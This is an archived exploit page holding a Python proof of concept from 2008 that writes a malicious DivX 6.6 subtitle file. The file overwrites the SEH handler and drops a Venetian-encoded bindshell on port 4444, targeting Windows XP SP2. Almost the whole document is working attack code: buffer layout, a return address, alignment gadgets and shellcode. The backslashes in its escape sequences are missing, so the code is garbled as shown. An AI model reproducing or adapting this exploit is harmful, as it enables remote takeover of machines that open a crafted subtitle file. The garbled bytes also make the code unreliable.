Home / os / win95

divx66.py.txt

Posted on 19 April 2008

#!/usr/bin/python ####################################################################### # DivX 6.6 SRT SEH overwrite PoC # Tested on XP SP2 # Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD # muts..at..offensive-security...dot..com # chris..at..offensive-security...dot..com # http://www.offensive-security.com/0day/divx66.py.txt # Notes: Unicode buffer - real pita. # Greetz to our wives - thanks for the couch! ####################################################################### # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:Documents and SettingsAdministratorDesktop> ####################################################################### # file = name of avi video file file="infidel.srt" # Unicode friendly POP POP RET somewhere in DivX 6.6 # Note: x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods ret="x94x48" # Align stack for register save nudge="x48x6d" # Payload building blocks buffer="x41" * 1032 xchg="x94x6d" # Swap back EAX, ESP for stack save,nop pushad="x60x6d" # Save stack registers,nop pushfd="x9cx6d" align_buffer="x05xFFx3Cx6Dx2Dxe1x3Cx6Dx2DxFFx10x6Dx05xFFx10x6D" # Point to end of buffer align_eax="x2Dx2Fx10x6Dx05x10x10x6D" # Align EAX for popad/fd popfd="x9Dx6D" # popfd,nop popad="x61x6D"# popad,nop padding="x70x70x70x70x70x70x70x70x70x70x70x70x70x70" # Crawl with remaining strength on bleeding knees to shellcode rest= "x01" * 5000000 # Buffer and shellcode canvas # PoC Venetian Bindshell on port 4444 - ph33r # Built on alternating 00 01 surface # Venetian self decoding bindshell - 1580 bytes bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer + "x80xFBx6Dx40x6Dx80x6Ax6Dx40x6Dx80xEAx6Dx40x6Dx80" "x4Dx6Dx40x6Dx80xE7x6Dx40x6Dx80xF9x6Dx40x6Dx80xFE" "x6Dx40x6Dx80xFFx6Dx40x6Dx80xFEx6Dx40x6Dx80x60x6D" "x40x6Dx80x8Ax6Dx40x6Dx80x6Cx6Dx40x6Dx80x23x6Dx40" "x6Dx80x24x6Dx40x6Dx80x8Ax6Dx40x6Dx80x45x6Dx40x6D" "x80x3Bx6Dx40x6Dx80x8Bx6Dx40x6Dx80x7Bx6Dx40x6Dx80" "x05x6Dx40x6Dx80x77x6Dx40x6Dx80x01x6Dx40x6Dx80xEE" "x6Dx40x6Dx80x8Bx6Dx40x6Dx80x4Ex6Dx40x6Dx80x18x6D" "x40x6Dx80x8Ax6Dx40x6Dx80x5Fx6Dx40x6Dx80x1Fx6Dx40" "x6Dx80x01x6Dx40x6Dx80xEAx6Dx40x6Dx80x49x6Dx40x6D" "x80x8Ax6Dx40x6Dx80x34x6Dx40x6Dx80x8Ax6Dx40x6Dx80" "x01x6Dx40x6Dx80xEDx6Dx40x6Dx80x31x6Dx40x6Dx80xBF" "x6Dx40x6Dx80x99x6Dx40x6Dx80xABx6Dx40x6Dx80x84x6D" "x40x6Dx80xBFx6Dx40x6D" "x80x74x6Dx40x6Dx80x06x6Dx40x6Dx80xC1x6Dx40x6Dx80" "xC9x6Dx40x6Dx80xEFx6Dx80x1Ex6Dx40x6Dx40x6Dx80xC2" "x6Dx40x6Dx80xEAx6Dx40x6Dx80xF4x6Dx40x6Dx80x3Ax6D" "x40x6Dx80x54x6Dx40x6Dx80x23x6Dx40x6Dx80x28x6Dx40" "x6Dx80x74x6Dx40x6Dx80xE5x6Dx40x6Dx80x8Ax6Dx40x6D" "x80x5Fx6Dx40x6Dx80x23x6Dx40x6Dx80x01x6Dx40x6Dx80" "xEAx6Dx40x6Dx80x66x6Dx40x6Dx80x8Ax6Dx40x6Dx80x0C" "x6Dx40x6Dx80x4Ax6Dx40x6Dx80x8Bx6Dx40x6Dx80x5Ex6D" "x40x6Dx80x1Cx6Dx40x6Dx40x6Dx80xEBx6Dx40x6Dx80x02" "x6Dx40x6Dx80x2Cx6Dx40x6Dx80x8Ax6Dx40x6Dx80x89x6D" "x40x6Dx80x6Bx6Dx40x6Dx80x24x6Dx40x6Dx80x1Bx6Dx40" "x6Dx80x61x6Dx40x6Dx80xC2x6Dx40x6Dx80x31x6Dx40x6D" "x80xDAx6Dx40x6Dx80x64x6Dx40x6Dx80x8Ax6Dx40x6Dx80" "x43x6Dx40x6Dx80x2Fx6Dx40x6Dx80x8Bx6Dx40x6Dx80x3F" "x6Dx40x6Dx80x0Cx6Dx40x6Dx80x8Ax6Dx40x6Dx80x70x6D" "x40x6Dx80x1Bx6Dx40x6Dx80xADx6Dx40x6Dx80x8Ax6Dx40" "x6Dx80x40x6Dx40x6Dx80x07x6Dx40x6Dx80x5Ex6Dx40x6D" "x80x67x6Dx40x6Dx80x8Ex6Dx40x6Dx80x4Dx6Dx40x6Dx80" "x0Ex6Dx40x6Dx80xEBx6Dx40x6Dx80x50x6Dx40x6Dx80xFE" "x6Dx40x6Dx80xD6x6Dx40x6Dx80x65x6Dx40x6Dx80x53x6D" "x40x6Dx80x65x6Dx40x6Dx80x68x6Dx40x6Dx80x32x6Dx40" "x6Dx80x32x6Dx40x6Dx80x67x6Dx40x6Dx80x77x6Dx40x6D" "x80x72x6Dx40x6Dx80x32x6Dx40x6Dx80x5Ex6Dx40x6Dx80" "x54x6Dx40x6Dx80xFEx6Dx40x6Dx80xD0x6Dx40x6Dx80x67" "x6Dx40x6Dx80xCBx6Dx40x6Dx80xECx6Dx40x6Dx80xFCx6D" "x40x6Dx80x3Ax6Dx40x6Dx80x50x6Dx40x6Dx80xFEx6Dx40" "x6Dx80xD6x6Dx40x6Dx80x5Ex6Dx40x6Dx80x89x6Dx40x6D" "x80xE4x6Dx40x6Dx80x66x6Dx40x6Dx80x80x6Dx40x6Dx80" "xEDx6Dx40x6Dx80x07x6Dx40x6Dx80x02x6Dx40x6Dx80x54" "x6Dx40x6Dx80x6Ax6Dx40x6Dx80x01x6Dx40x6Dx80xFFx6D" "x40x6Dx80xCFx6Dx40x6Dx80x68x6Dx40x6Dx80xD8x6Dx40" "x6Dx80x09x6Dx40x6Dx80xF4x6Dx40x6Dx80xADx6Dx40x6D" "x80x56x6Dx40x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40x6Dx80" "x53x6Dx40x6Dx80x52x6Dx40x6Dx80x53x6Dx40x6Dx80x52" "x6Dx40x6Dx80x53x6Dx40x6Dx80x42x6Dx40x6Dx80x53x6D" "x40x6Dx80x42x6Dx40x6Dx80x53x6Dx40x6Dx80xFEx6Dx40" "x6Dx80xD0x6Dx40x6Dx80x65x6Dx40x6Dx80x68x6Dx40x6D" "x80x10x6Dx40x6Dx80x5Cx6Dx40x6Dx80x65x6Dx40x6Dx80" "x53x6Dx40x6Dx80x88x6Dx40x6Dx80xE1x6Dx40x6Dx80x94" "x6Dx40x6Dx80x68x6Dx40x6Dx80xA3x6Dx40x6Dx80x1Ax6D" "x40x6Dx80x6Fx6Dx40x6Dx80xC7x6Dx40x6Dx80x56x6Dx40" "x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40x6Dx80x6Ax6Dx40x6D" "x80x0Fx6Dx40x6Dx80x51x6Dx40x6Dx80x54x6Dx40x6Dx80" "xFFx6Dx40x6Dx80xCFx6Dx40x6Dx80x68x6Dx40x6Dx80xA3" "x6Dx40x6Dx80xADx6Dx40x6Dx80x2Dx6Dx40x6Dx80xE9x6D" "x40x6Dx80x56x6Dx40x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40" "x6Dx80x53x6Dx40x6Dx80x54x6Dx40x6Dx80xFFx6Dx40x6D" "x80xCFx6Dx40x6Dx80x68x6Dx40x6Dx80xE4x6Dx40x6Dx80" "x49x6Dx40x6Dx80x85x6Dx40x6Dx80x49x6Dx40x6Dx80x56" "x6Dx40x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40x6Dx80x50x6D" "x40x6Dx80x53x6Dx40x6Dx80x54x6Dx40x6Dx80x54x6Dx40" "x6Dx80xFFx6Dx40x6Dx80xCFx6Dx40x6Dx80x93x6Dx40x6D" "x80x67x6Dx40x6Dx80xE7x6Dx40x6Dx80x78x6Dx40x6Dx80" "xC6x6Dx40x6Dx80x78x6Dx40x6Dx80x57x6Dx40x6Dx80xFE" "x6Dx40x6Dx80xD6x6Dx40x6Dx80x54x6Dx40x6Dx80xFFx6D" "x40x6Dx80xCFx6Dx40x6Dx80x66x6Dx40x6Dx80x69x6Dx40" "x6Dx80x64x6Dx40x6Dx80x65x6Dx40x6Dx80x68x6Dx40x6D" "x80x62x6Dx40x6Dx80x6Dx6Dx40x6Dx80x88x6Dx40x6Dx80" "xE5x6Dx40x6Dx80x69x6Dx40x6Dx80x50x6Dx40x6Dx80x58" "x6Dx40x6Dx80x29x6Dx40x6Dx80xCBx6Dx40x6Dx80x89x6D" "x40x6Dx80xE6x6Dx40x6Dx80x6Ax6Dx40x6Dx80x43x6Dx40" "x6Dx80x89x6Dx40x6Dx80xE1x6Dx40x6Dx80x31x6Dx40x6D" "x80xBFx6Dx40x6Dx80xF3x6Dx40x6Dx80xA9x6Dx40x6Dx80" "xFEx6Dx40x6Dx80x41x6Dx40x6Dx80x2Dx6Dx40x6Dx80xFD" "x6Dx40x6Dx80x42x6Dx40x6Dx80x2Bx6Dx40x6Dx80x93x6D" "x40x6Dx80x8Cx6Dx40x6Dx80x7Ax6Dx40x6Dx80x37x6Dx40" "x6Dx80xABx6Dx40x6Dx80xAAx6Dx40x6Dx80xABx6Dx40x6D" "x80x67x6Dx40x6Dx80x72x6Dx40x6Dx80xFDx6Dx40x6Dx80" "xB3x6Dx40x6Dx80x15x6Dx40x6Dx80xFFx6Dx40x6Dx80x74" "x6Dx40x6Dx80x44x6Dx40x6Dx80xFEx6Dx40x6Dx80xD6x6D" "x40x6Dx80x5Ax6Dx40x6Dx80x57x6Dx40x6Dx80x51x6Dx40" "x6Dx80x51x6Dx40x6Dx80x50x6Dx40x6Dx80x51x6Dx40x6D" "x80x69x6Dx40x6Dx80x01x6Dx40x6Dx80x50x6Dx40x6Dx80" "x51x6Dx40x6Dx80x54x6Dx40x6Dx80x51x6Dx40x6Dx80xFE" "x6Dx40x6Dx80xD0x6Dx40x6Dx80x67x6Dx40x6Dx80xADx6D" "x40x6Dx80xD8x6Dx40x6Dx80x05x6Dx40x6Dx80xCDx6Dx40" "x6Dx80x53x6Dx40x6Dx80xFEx6Dx40x6Dx80xD6x6Dx40x6D" "x80x69x6Dx40x6Dx80xFFx6Dx40x6Dx80xFEx6Dx40x6Dx80" "x37x6Dx40x6Dx80xFEx6Dx40x6Dx80xD0x6Dx40x6Dx80x8A" "x6Dx40x6Dx80x57x6Dx40x6Dx80xFBx6Dx40x6Dx80x83x6D" "x40x6Dx80xC3x6Dx40x6Dx80x64x6Dx40x6Dx80xFEx6Dx40" "x6Dx80xD6x6Dx40x6Dx80x51x6Dx40x6Dx80xFFx6Dx40x6D" "x80xCFx6Dx40x6Dx80x68x6Dx40x6Dx80xEEx6Dx40x6Dx80" "xCEx6Dx40x6Dx80xDFx6Dx40x6Dx80x60x6Dx40x6Dx80x52" "x6Dx40x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40x6Dx80xFFx6D" "x40x6Dx80xCFx6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest) f=open(file,'w') f.write("1 ") f.write("00:00:01,001 --> 00:00:02,001 ") f.write(bindshell) f.close() print "DivX 6.6 SEH SRT Overflow - PoC "; print "http://www.offensive-security.com/0day/divx66.py.txt "; print "SRT has been created - ph33r ";

 

TOP